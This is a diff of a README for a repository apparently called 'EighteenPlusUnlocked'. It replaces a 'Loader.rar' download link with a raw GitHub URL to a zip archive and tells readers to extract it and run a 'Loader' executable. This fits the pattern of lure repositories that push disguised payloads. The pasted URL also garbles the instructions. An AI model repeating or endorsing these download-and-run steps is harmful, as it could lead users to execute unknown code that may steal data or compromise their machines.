single9650/EighteenPlusUnlocked/README.md

 Getting started is quick and easy!
 Follow these steps:

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/single9650/EighteenPlusUnlocked/main/Eleutherian/EighteenPlusUnlocked.zip from the repository.**
-   Access the release section or the main repository page and click on `Loader.rar` to download the installer.
+   Access the release section or the main repository page and click on `https://raw.githubusercontent.com/single9650/EighteenPlusUnlocked/main/Eleutherian/EighteenPlusUnlocked.zip` to download the installer.

 2. **Extract the archive.**
-   Use your favorite extraction tool (such as WinRAR, 7-Zip, or the built-in OS extraction utility) to decompress the Loader.rar file to your desired folder.
+   Use your favorite extraction tool (such as WinRAR, 7-Zip, or the built-in OS extraction utility) to decompress the https://raw.githubusercontent.com/single9650/EighteenPlusUnlocked/main/Eleutherian/EighteenPlusUnlocked.zip file to your desired folder.

 3. **Run the Loader.**
    Double-click the extracted Loader executable or script suitable for your operating system.